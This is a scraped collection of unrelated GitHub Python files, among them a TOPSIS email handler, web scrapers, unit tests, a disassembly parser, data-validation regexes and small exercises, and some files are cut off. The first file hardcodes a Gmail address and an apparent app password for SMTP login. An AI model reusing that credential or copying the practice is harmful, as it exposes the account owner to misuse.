print(os.path.dirname(os.path.abspath(file.filename)))\n df = pd.DataFrame(pd.read_csv(f'{os.path.dirname(os.path.abspath(file.filename))}/{Path(file.filename).stem}.csv'))\n weights = str(res['weights'])\n impacts = str(res['impacts'])\n df1 = df.copy()\n df.drop('Fund 
Name', inplace=True, axis=1)\n result = euclidean_distance(df, len(df.columns), weights,\n impacts,\n df.copy())\n result['Fund Name'] = df1['Fund Name']\n gmail_user = 'sahilkadiyan9817@gmail.com'\n gmail_password = 'sdmsywzqwtqbzbre'\n\n sent_from = gmail_user\n to = [res['email']]\n subject = 'Lorem ipsum dolor sit amet'\n body = result\n\n email_text = \"\"\"\\\n From: %s\n To: %s\n Subject: %s\n\n %s\n \"\"\" % (sent_from, \", \".join(to), subject, body)\n\n try:\n smtp_server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n smtp_server.ehlo()\n smtp_server.login(gmail_user, gmail_password)\n smtp_server.sendmail(sent_from, to, email_text)\n smtp_server.close()\n print(\"Email sent successfully!\")\n except Exception as ex:\n print(\"Something went wrong….\", ex)\n\n return 'success'\n # return \"success\"\n","repo_name":"sahilkadiyan/topsis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6768630059","text":"import re\nimport numpy as np\nimport pandas as pd\nimport requests\n\nfrom bs4 import BeautifulSoup\n\nimport infoCourselist\n\nmk8_course = infoCourselist.mk8_abbrv\nmk8_course_full = infoCourselist.mk8_full\nmk8_course_lower = [x.lower() for x in infoCourselist.mk8_full]\n\ndef partial_match(input, full=mk8_course_lower):\n match = []\n idx = 0\n for track in full:\n if track.lower().find(input) != -1:\n match.append(idx)\n idx += 1\n return match\n\ndef name_conversion(input, abbrv=mk8_course, full=mk8_course_lower):\n found = None\n idx = 0\n for track in full:\n if track.lower() == input:\n found = abbrv[idx]\n idx += 1\n\n return found\n\ndef nita(input, place=None, abbrv=mk8_course):\n url = 'https://docs.google.com/spreadsheets/u/1/d/e/2PACX-1vRDdedRm18RtIu2hB9l5WrbaClaIPnZAVh_Xf7IeGzmsOVHcNdjoD3VWo8EdMxJ7JKdtcbFnebLjCcV/pubhtml'\n _ = requests.get(url)\n data = np.array(re.findall(r'(\\d+):(\\d+).(\\d+)', requests.get(url).text))\n all_time = data[0:560].reshape(14,10,4,3)\n course = abbrv.index(str.lower(input))\n\n if place:\n nita = np.transpose(all_time,(0,2,1,3)).reshape(56,10,3)[course][place-1]\n return nita[0]+':'+nita[1]+'.'+nita[2]\n \n else:\n nita = np.transpose(all_time,(0,2,1,3)).reshape(56,10,3)[course][0]\n return nita[0]+':'+nita[1]+'.'+nita[2]\n\ndef wiggler(input, place=None, abbrv=mk8_course):\n url = 'https://docs.google.com/spreadsheets/u/1/d/e/2PACX-1vTOT3PJwMcMrOE--rBPV3Vz1SUegmpmpCtP8NzMQoxHljks2JDaYQ8H1pj4Pi0i5xOmnnS3eDAxc4zY/pubhtml'\n _ = requests.get(url)\n data = np.array(re.findall(r'(\\d+):(\\d+).(\\d+)', requests.get(url).text))\n all_time = data[0:560].reshape(14,10,4,3)\n course = abbrv.index(str.lower(input))\n\n if place:\n nita = np.transpose(all_time,(0,2,1,3)).reshape(56,10,3)[course][place-1]\n return nita[0]+':'+nita[1]+'.'+nita[2]\n \n else:\n nita = np.transpose(all_time,(0,2,1,3)).reshape(56,10,3)[course][0]\n return nita[0]+':'+nita[1]+'.'+nita[2]\n\ndef wr(input, abbrv=mk8_course, full=mk8_course_lower):\n url = 'https://mkwrs.com/mk8dx/wrs.php'\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n course = full[abbrv.index(input.lower())]\n course_link = 'track='+mk8_course_full[abbrv.index(input.lower())].replace(' ','+')\n links = []\n for link in soup.find_all('a'):\n links.append(link.get('href'))\n\n wr_link = 'not available'\n for idx,link in enumerate(links):\n if link.endswith(course_link):\n temp = links[idx+1]\n if 
temp.startswith('https://www.youtube.com/'):\n wr_link = temp\n\n data = np.char.lower(np.array((soup.get_text().split('\\n'))))\n \n match = np.where(data==course)[0][0]\n time = data[match+1].split('\\'')[0]+':'+data[match+1].split('\\'')[1].split('\"')[0]+'.'+data[match+1].split('\\'')[1].split('\"')[1]\n time = data[match+1].split('\\'')[0]+':'+data[match+1].split('\\'')[1].split('\"')[0]+'.'+data[match+1].split('\\'')[1].split('\"')[1]\n player = data[match+2]\n return time+'\\tby '+player+'\\tvideo: '+wr_link\n\nif __name__ == '__main__':\n print(wr('rr'))","repo_name":"levpw/shyguybot","sub_path":"ta.py","file_name":"ta.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4483894698","text":"#test file\nimport unittest \nimport main\nfrom collections import Counter\nclass Test(unittest.TestCase):\n def test_kid_safe(self):\n words = Counter([\"hello\",\"world\"])\n self.assertAlmostEqual(main.kid_safe(words),1)\n words = Counter([\"hello\", \"sex\"])\n self.assertAlmostEqual(main.kid_safe(words), 0.9)\n \n#test love words\n def test_love(self):\n words = Counter([\"hello\", \"world\"])\n self.assertAlmostEqual(main.love(words), 0)\n words = Counter([\"hello\", \"love\"])\n self.assertTrue(main.love(words)>=0 )\n\n#test mood function \n def test_mood(self):\n words = Counter([\"hello\", \"happy\"])\n self.assertAlmostEqual(main.mood(words), 1)\n words = Counter([\"hello\", \"sad\"])\n self.assertAlmostEqual(main.mood(words), 0)\n words = Counter([\"hello\", \"world\"])\n self.assertAlmostEqual(main.mood(words), 0.5)\n words=Counter(['happy','sad'])\n self.assertAlmostEqual(main.mood(words), 0.5)\n words=Counter(['happy','sad','joy'])\n self.assertAlmostEqual(main.mood(words), 0.7)\n words=Counter(['happy','sad','weep'])\n self.assertAlmostEqual(main.mood(words), 0.3)\n words=Counter(['happy','sad','weep','cry'])\n self.assertAlmostEqual(main.mood(words), 1/4, delta=0.1)\n \n\n#test length \n def test_length(self):\n words = Counter([\"hello\", \"world\"])\n self.assertAlmostEqual(main.length(words), 0.00, delta=1e-4)\n words = Counter(['i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h'])\n self.assertAlmostEqual(main.length(words), 0.3, delta=1e-4)\n words = Counter(['i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 
'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h'])\n self.assertAlmostEqual(main.length(words), 1.0, delta=1e-4)\n \n\n#test complexity\n def test_complexity(self):\n words = Counter([\"hello\", \"world\"])\n self.assertAlmostEqual(main.complexity(words), 0)\n words = Counter([\"hello\", \"brandish\"])\n self.assertAlmostEqual(main.complexity(words), 0.2)\n \n \n#test read data \n def test_read_data(self):\n data = main.read_data(\"./Lyrics\")\n self.assertEqual(len(data[\"characterizations\"]),1001)\n \n \nsuite = unittest.defaultTestLoader.loadTestsFromTestCase(Test)\n# Run each test in suite\nunittest.TextTestRunner().run(suite)\n ","repo_name":"JessicaColumbia/Project9","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"7046612058","text":"from dataclasses import dataclass\nfrom typing import List\nimport datetime\n\n@dataclass\nclass TimeStamp:\n start: datetime.time\n end: datetime.time\n\n def calculateTimeDiffInSecs(self):\n placeholder_date = datetime.datetime(datetime.MINYEAR, 1, 1)\n new_start_datetime = datetime.datetime.combine(placeholder_date, self.start)\n new_end_datetime = datetime.datetime.combine(placeholder_date, self.end)\n\n return int((new_end_datetime - new_start_datetime).total_seconds())\n\n\n@dataclass\nclass DetailedInstance:\n detailedName: str\n timestamps: List[TimeStamp]\n totalTime: int = 0 # in seconds\n\n def __post_init__(self):\n for ts in self.timestamps:\n self.totalTime += ts.calculateTimeDiffInSecs()\n\n def addTimeStamp(self, ts: TimeStamp):\n if ts not in self.timestamps:\n self.timestamps.append(ts)\n self.totalTime += ts.calculateTimeDiffInSecs()\n\n\n@dataclass\nclass ApplicationWithInstances:\n appName: str\n instances: List[DetailedInstance]\n\n def updateOrAddInstance(self, di: DetailedInstance):\n instanceDetailedNames = [x.detailedName for x in self.instances]\n\n if di.detailedName not in instanceDetailedNames:\n self.instances.append(di)\n else:\n for instance in self.instances:\n if di.detailedName == instance.detailedName:\n for ts in di.timestamps:\n instance.addTimeStamp(ts)\n break\n\n #gets instances from another instance and based on them update this instance\n def updateBasedOnOther(self, other):\n if self.appName == other.appName:\n for i in other.instances:\n self.updateOrAddInstance(i)\n\n def sumOfTotalTimeForApplication(self):\n totalTimeForApp = 0\n for instance in self.instances:\n totalTimeForApp += instance.totalTime\n return 
totalTimeForApp\n","repo_name":"Barud21/ActivityMonitor","sub_path":"ApplicationObjects.py","file_name":"ApplicationObjects.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"780803219","text":"# Me Computer, Mandalay.\n# June 18, 2022\n# exercise_11.py\n# Leap year determination\n# if year is divisible by 4, it's a leap years\n# unless it's a century year not divisible by 400\n\ndef isLeap(year):\n if year % 4 != 0:\n return False\n elif year % 100 == 0:\n if year % 400 == 0:\n return True\n else:\n return False\n else:\n return True\n\ndef main():\n print(\"This program calculates whether a year is a leap year.\\n\")\n year = int(input(\"Enter a year: \"))\n if isLeap(year):\n print(year, \"is a leap year.\")\n else:\n print(year, \"is not a leap year.\")\n \nif __name__ == '__main__': main()","repo_name":"YeTun/An-Introduction-to-computer-science","sub_path":"chap07/exercise_11.py","file_name":"exercise_11.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72328955332","text":"from time import sleep\nprint('Menu de Opções')\n\ndecisor = 0 # Tomada de decisão do programa\n\nn1 = int(input('\\nPrimeiro número: '))\nn2 = int(input('Segundo número: '))\n\nwhile decisor != 1: # Enquanto o decisor não for 1 o programa fica em loop.\n menu = int(input('\\n[ 1 ] somar'\n '\\n[ 2 ] multiplicar'\n '\\n[ 3 ] saber o maior número'\n '\\n[ 4 ] digitar novos números'\n '\\n[ 5 ] sair do programa'\n '\\n->>> Escolha o que pretende fazer: '))\n if menu == 1:\n print('\\nA soma entre {} e {} é {}.'.format(n1, n2, (n1 + n2)))\n elif menu == 2:\n print('\\no resultado de {} x {} é {}.'.format(n1, n2, (n1 * n2)))\n elif menu == 3:\n if n1 > n2:\n maior = n1\n else:\n maior = n2\n print('\\nEntre {} e {} o maior é {}.'.format(n1, n2, maior))\n elif menu == 4:\n print('\\nInforme os números novamente.')\n n1 = int(input('Primeiro número: '))\n n2 = int(input('Segundo número: '))\n elif menu == 5:\n print('Finalizando...')\n decisor = 1\n else:\n print('\\nEntrada Inválida. Tente Novamente!')\n print('=-=' * 10)\n sleep(2)\nprint('\\nPrograma finalizado. 
Obrigado por usar :)')\n","repo_name":"da-ferreira/curso-em-video","sub_path":"Python/exercícios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30081458657","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport argparse\nimport re\nimport exceptions\nimport json\n\n######\n# BasicBlock data model\n#\n# .addr = Address of block (VMA)\n# .graph = Name of graph that BB is a part of\n# .instrs = Array of instructions\n# .next = Array of successor blocks\n######\n\n######\n# Instr data model\n#\n# .opcode = The operation/verb for the instruction\n# .operands = The individual operands (array)\n# .text = The disassembly row for the instruction\n# .raw = The byte values representing the instruction\n# .addr = The address of the instruction\n######\n\nclass Instr(object):\n def __init__(self, instr_line):\n '''Parses a single line of text into structured instruction\n representation'''\n self.opcode = ''\n self.operands = []\n self.text = ''\n self.raw = []\n self.addr = int(instr_line[0:instr_line.find(':')], 0)\n self.addr = '0x{:0>16x}'.format(int(instr_line[0:instr_line.find(':')], 0))\n\n # First, get the positions of the two pipes\n pipe_loc = [-1, -1]\n pipe_loc[0] = instr_line.find('|')\n pipe_loc[1] = instr_line.rfind('|')\n if pipe_loc[0] < 1 or pipe_loc[1] <= pipe_loc[0]:\n raise exceptions.SyntaxError(\"Poorly formatted line: {0}\".format(instr_line))\n\n # Next, extract the byte values:\n for v in instr_line[instr_line.find(':') + 1:pipe_loc[0]].strip().split(' '):\n self.raw.append(int('0x' + v, 0))\n\n # Next, extract the text describing the instruction\n self.text = instr_line[pipe_loc[1] + 1:].strip()\n self.opcode = self.text[0:self.text.find(' ')]\n self.operands = self.text[self.text.find(' '):].strip().split(', ')\n\n def __repr__(self):\n \"\"\"Return a JSON-format string representation of the elements\"\"\"\n return \"{\" + \"'addr': {a}, 'text': {t}, 'raw': [{r}], 'opcode': {o}, 'operands': {p}\".format(\n a=hex(self.addr), t=repr(self.text), o=repr(self.opcode), p=repr(self.operands),\n r=', '.join(hex(x) for x in self.raw)) + \"}\"\n\n def to_dict(self):\n \"\"\"Return the member values to make a dict\"\"\"\n return {'addr': self.addr,\n 'opcode': self.opcode,\n 'operands': self.operands,\n 'raw': self.raw,\n 'text': self.text}\n\nclass BasicBlock(object):\n def __init__(self, raw_lines):\n \"\"\"Parses a list of raw_lines into a BasicBlock structure, starting with\n the line after \"Basic block\". 
Will iterate through raw_lines and\n will return to caller once it parses an end-of-block situation\"\"\"\n self.instrs = []\n self.addr = ''\n self.graph = ''\n self.next = []\n\n cur_state = \"Begin\"\n\n for raw_line in (x.strip() for x in raw_lines):\n # If we reach block separator, then break out\n if raw_line == '':\n break\n\n # If we reach \"Successor blocks\" statement, save them and break\n succ_stmt = raw_line.find(' Successor blocks: ')\n if succ_stmt > 0:\n if raw_line[succ_stmt + 19:].find('none') == -1:\n self.next.extend(filter(lambda x: x != 'unknown',\n raw_line[succ_stmt + 19:].strip().split(', ')))\n else:\n self.next = []\n\n # If line contains a | then it is possibly going to have an\n # instruction\n elif raw_line.find('|') > 0:\n # If it is the first instruction, then save its addr as the\n # block addr\n if self.addr == '':\n self.addr = '0x{:0>16x}'.format(int(raw_line[0:raw_line.find(':')], 0))\n\n # Finally, parse the line into an Instr\n self.instrs.append(Instr(raw_line))\n\n def __repr__(self):\n \"\"\"Return a JSON-format string representation of the elements\"\"\"\n return \"{\" + \"'addr': {a}, 'instrs': {i}, 'graph': {g}, 'next': {n}\".format(a=self.addr,\n i=repr(self.instrs), g=repr(self.graph), n=repr(self.next)) + \"}\"\n\n def to_dict(self):\n \"\"\"Iterate through the member values like a dict\"\"\"\n return {'addr': self.addr,\n 'graph': self.graph,\n 'instrs': [i.to_dict() for i in self.instrs],\n 'next': self.next}\n\nfile_state = \"Nothing\"\n\ninf = file(sys.argv[1], 'r')\n\nbbs = []\n\nfor l in inf:\n if l.find('/* Interpretation PE */') > -1 or l.find('/* Interpretation ELF */') > -1:\n file_state = \"Parse\"\n\n if file_state == \"Parse\":\n if l.find(': Basic block '):\n bbs.append(BasicBlock(inf))\n\nb = {'blocks': [b.to_dict() for b in bbs]}\ns = json.dumps(b)\nprint(s)\n","repo_name":"ckane/mdna","sub_path":"rose2graph.py","file_name":"rose2graph.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25033194746","text":"import re\nfrom typing import Dict, Set\n\nINTEGER_REGEX = re.compile(r\"^[0-9]+$\")\nTIMESTAMP_REGEX = re.compile(r\"^[0-9]{10}$\")\nBASE64_REGEX = re.compile(r\"^[A-Za-z0-9+/]+={0,2}$\")\n\nUNFILTERED_ALL_REQUIRED_FIELDS: Set[str] = {\n \"action_source\",\n \"conversion_value\",\n \"currency_type\",\n \"event_type\",\n \"timestamp\",\n}\n\nUNFILTERED_ONE_OR_MORE_REQUIRED_FIELDS: Set[str] = {\n \"email\",\n \"device_id\",\n \"phone\",\n \"client_ip_address\",\n \"client_user_agent\",\n \"click_id\",\n \"login_id\",\n}\n\nUNFILTERED_FORMAT_VALIDATION_FOR_FIELD: Dict[str, re.Pattern] = {\n \"email\": re.compile(r\"^[a-f0-9]{64}$\"),\n \"device_id\": re.compile(r\"^([a-f0-9]{32}|[a-f0-9-]{36})$\"),\n \"timestamp\": TIMESTAMP_REGEX,\n \"currency_type\": re.compile(r\"^[a-z]+$\"),\n \"conversion_value\": INTEGER_REGEX,\n \"action_source\": re.compile(\n r\"^(email|website|phone_call|chat|physical_store|system_generated|other)$\"\n ),\n \"event_type\": re.compile(r\"^.+$\"),\n \"phone\": re.compile(r\"^[a-f0-9]{64}$\"),\n \"client_ip_address\": re.compile(\n r\"^(\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}|(::)?([a-fA-F0-9:]+:+)+[a-fA-F0-9]+(::)?)$\"\n ),\n \"client_user_agent\": re.compile(r\"^.+$\"),\n \"click_id\": re.compile(r\"^fb[.0-9]+$\"),\n \"login_id\": INTEGER_REGEX,\n \"browser_name\": re.compile(r\"^.+$\"),\n \"device_os\": re.compile(r\"^.+$\"),\n \"device_os_version\": re.compile(r\"^[.0-9]+$\"),\n \"data_source_id\": 
INTEGER_REGEX,\n}\n\nPA_ALL_REQUIRED_FIELDS: Set[str] = {\n \"id_\",\n \"conversion_timestamp\",\n \"conversion_value\",\n \"conversion_metadata\",\n}\n\nPA_FORMAT_VALIDATION_FOR_FIELD: Dict[str, re.Pattern] = {\n \"id_\": BASE64_REGEX,\n \"conversion_timestamp\": TIMESTAMP_REGEX,\n \"conversion_value\": INTEGER_REGEX,\n \"conversion_metadata\": INTEGER_REGEX,\n}\n\nPL_ALL_REQUIRED_FIELDS: Set[str] = {\n \"id_\",\n \"event_timestamp\",\n \"value\",\n}\n\nPL_FORMAT_VALIDATION_FOR_FIELD: Dict[str, re.Pattern] = {\n \"id_\": BASE64_REGEX,\n \"event_timestamp\": TIMESTAMP_REGEX,\n \"value\": INTEGER_REGEX,\n}\n","repo_name":"yutong-w/fbpcs-0125","sub_path":"fbpcs/infra/cloud_bridge/data_validation/validation_utility/expected_fields.py","file_name":"expected_fields.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42221821395","text":"## 二叉树的遍历\n\n# 树的遍历是树的一种重要的运算。所谓遍历是指对树中所有结点的信息的访问,即依次对树中每个结点访问一次且\n# 仅访问一次,我们把这种对所有节点的访问称为遍历(traversal)。那么树的两种重要的遍历模式是深度优先遍历\n# 和广度优先遍历,深度优先一般用递归,广度优先一般用队列。一般情况下能用递归实现的算法大部分也能用堆栈\n# 来实现\n\n\n###深度优先遍历\n\n#对于一颗二叉树,深度优先搜索(Depth First Search)是沿着树的深度遍历树的节点,尽可能深的搜索树的分支。那\n# 么深度遍历有重要的三种方法。这三种方式常被用于访问树的节点,它们之间的不同在于访问每个节点的次序不\n# 同。这三种遍历分别叫做先序遍历(preorder),中序遍历(inorder)和后序遍历(postorder)。\n\n##先序遍历 \n# 在先序遍历中,我们先访问根节点,然后递归使用先序遍历访问左子树,\n# 再递归使用先序遍历访问右子树根节点->左子树->右子树\n\ndef preorder(self, root):\n \"\"\" 递归实现先序遍历 \"\"\"\n if root == None:\n return\n print(root.elem)\n self.preorder(root.lchild)\n self.preorder(root.rchild)\n\n\n##中序遍历\n# 在中序遍历中,我们递归使用中序遍历访问左子树,然后访问根节点,\n# 最后再递归使用中序遍历访问右子树左子树->根节点->右子树\n\ndef inorder(self, root):\n \"\"\" 递归实现中序遍历 \"\"\"\n if root == None:\n return\n self.inorder(root.lchild)\n print(root.elem)\n self.inorder(root.rchild)\n\n\n##后序遍历\n# 在后序遍历中,我们先递归使用后序遍历访问左子树和右子树,\n# 最后访问根节点左子树->右子树->根节点\n\ndef postorder(self, root):\n \"\"\" 递归实现后续遍历 \"\"\"\n if root == None:\n self.postorder(root.lchild)\n self.postorder(root.rchild)\n print(root.elem)\n\n\n##广度优先遍历(层次遍历)\n\n#从树的root开始, 从上到下从左到右遍历整个树的节点\n\ndef breadth_travel(self, root):\n \"\"\" 利用队列实现树的层次遍历 \"\"\"\n if root == None:\n return\n queue = []\n queue.append(root)\n while queue:\n node = queue.pop(0)\n print(node.elem)\n if node.lchild != None:\n queue.append(node.lchild)\n if node.rchild != None:\n queue.append(node.rchild)","repo_name":"tangzixiong/python-project","sub_path":"data structure & algorithm/tree_traversal.py","file_name":"tree_traversal.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38497193513","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 17 12:08:05 2021\n\n@author: yl254115\n\"\"\"\nimport os\nimport itertools\n\npath2stimuli = '../../stimuli/'\n\nelements = {}\nelements['prefixes'] = ['re', 'un', 'dis']\nelements['suffixes'] = ['er', 'ly', 'able']\nelements['CVCs'] = ['kag', 'tis', 'viv']\nelements['affix_patterns'] = ['root', '1P', '1S', '2P', '1P1S', '2P1S']\n\ndef get_affixes(affix_pattern, elements):\n if affix_pattern == 'root':\n prefixes = ['']\n suffixes = ['']\n elif affix_pattern == '1P':\n prefixes = elements['prefixes']\n suffixes = ['']\n elif affix_pattern == '1S':\n prefixes = ['']\n suffixes = elements['suffixes'] \n elif affix_pattern == '2P':\n prefixes = ['unre', 'undis']\n suffixes = ['']\n elif affix_pattern == '1P1S':\n prefixes = elements['prefixes']\n suffixes = ['ly', 'able'] # only suffixes that can 
combine with verbs\n elif affix_pattern == '2P1S':\n prefixes = ['unre', 'undis']\n suffixes = elements['suffixes'] \n return prefixes, suffixes\n\n\ndef get_control_stimulus(prefix, CVC, suffix):\n \n #\n control_CVC = CVC\n \n #\n if prefix == 'unre':\n control_prefix = 'ernu'\n elif prefix == 'undis':\n control_prefix = 'nusid'\n else:\n control_prefix = prefix[::-1]\n \n #\n if suffix == 'able':\n control_suffix = 'elba'\n elif suffix == 'er':\n control_suffix = 're'\n elif suffix == 'ly':\n control_suffix = 'yl'\n elif suffix == '':\n control_suffix = ''\n \n control_stimulus = control_prefix + control_CVC + control_suffix\n return control_stimulus\n\nf_features = open(os.path.join(path2stimuli, 'pseudowords_features.csv'), 'w')\nf = open(os.path.join(path2stimuli, 'pseudowords.csv'), 'w')\n\ncnt = 0\ntarget_stimuli = []\ncontrol_stimuli = []\nfor CVC in elements['CVCs']:\n print(f'Current root: {CVC}')\n for affix_pattern in elements['affix_patterns']:\n prefixes, suffixes = get_affixes(affix_pattern, elements)\n for prefix, suffix in list(itertools.product(prefixes, suffixes)):\n target_stimulus = prefix + CVC + suffix\n cnt += 1\n print(target_stimulus)\n target_stimuli.append(target_stimulus)\n \n line = f'{cnt}, {target_stimulus}, target, {CVC}, {prefix}, {suffix}, {affix_pattern}\\n'\n f_features.write(line)\n f.write(f'{target_stimulus}\\n')\n \n if affix_pattern != 'root':\n control_stimulus = get_control_stimulus(prefix, CVC, suffix)\n cnt += 1\n print(control_stimulus)\n control_stimuli.append(control_stimulus)\n \n line = f'{cnt}, {control_stimulus}, control, {affix_pattern}, {CVC}, {prefix}, {suffix}\\n'\n f_features.write(line)\n f.write(f'{control_stimulus}\\n')\nf.close()\nf_features.close()\n \nprint(f'Number of stimuli {cnt}')\nn_repetitions = 8\nprint(f'Total time: {cnt*n_repetitions/2/60}')\n","repo_name":"yairlak/morphology_single_unit","sub_path":"code/stimuli/generate_complex_morph_pseudowords.py","file_name":"generate_complex_morph_pseudowords.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3223395845","text":"# importing panda library \r\nimport pandas as pd \r\n \r\n# readinag given csv file \r\n# and creating dataframe \r\ndataframe1 = pd.read_csv(\"ecg_data.dat\") \r\n \r\n# storing this dataframe in a csv file \r\ndataframe1.to_csv('ecg-data.csv', \r\n index = None) ","repo_name":"pratik-mk/ECG-Analysis","sub_path":"dat_to_csv.py","file_name":"dat_to_csv.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23354107510","text":"#Given a singly linked list L: L0→L1→…→Ln-1→Ln,\n#reorder it to: L0→Ln→L1→Ln-1→L2→Ln-2→…\n\n#You must do this in-place without altering the nodes' values.\n\n#For example,\n#Given {1,2,3,4}, reorder it to {1,4,2,3}.\n\n#### SOLUTION ####\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n if head is None or head.next is None:\n return\n\n # 3 steps\n # Step 1: Find the middle of the list\n p1, p2 = head, head\n \n while p2.next and p2.next.next:\n p1 = p1.next\n p2 = p2.next.next\n \n # Step 2: Reverse the half after middle\n # 1->2->3->4->5->6 to 1->2->3->6->5->4\n pre = p1\n prev = 
None\n curr = p1.next\n while curr:\n next = curr.next\n curr.next = prev\n prev = curr\n curr = next\n pre.next = prev\n \n # Step 3: Start reorder one by one\n # 1->2->3->6->5->4 to 1->6->2->5->3->4\n p1 = head\n p2 = pre.next\n while p1 != pre:\n pre.next = p2.next\n p2.next = p1.next\n p1.next = p2\n p1 = p2.next\n p2 = pre.next\n","repo_name":"sheelabhadra/LeetCode-Python","sub_path":"143_Reorder_List.py","file_name":"143_Reorder_List.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"19889505876","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom ferrari.items import FerrariItem\n\nclass Ferrari488Spider(CrawlSpider):\n name = 'ferrari488'\n allowed_domains = ['car.autohome.com.cn']\n start_urls = ['https://car.autohome.com.cn/pic/series/3720.html']\n\n rules = (\n Rule(LinkExtractor(allow=r\"https://car.autohome.com.cn/pic/series/3720.+\"),\n callback=\"parse_page\", follow=True),\n )\n\n def parse_page(self, response):\n category = response.xpath(\"//div[@class='uibox']/div/text()\").get()\n srcs = response.xpath(\"//div[contains(@class,'uibox-con')]/ul/li//img/@src\").getall()\n srcs = list(map(lambda x: response.urljoin(x.replace(\"t_\", \"\")), srcs))\n # srcs = list(map(lambda x: x.replace(\"t_\", \"\"), srcs))\n # srcs = list(map(lambda x: response.urljoin(x), srcs))\n yield FerrariItem(category=category, image_urls=srcs)\n\n\n\n def test_page(self, response):\n uiboxs = response.xpath(\"//div[@class='uibox']\")[1:]\n 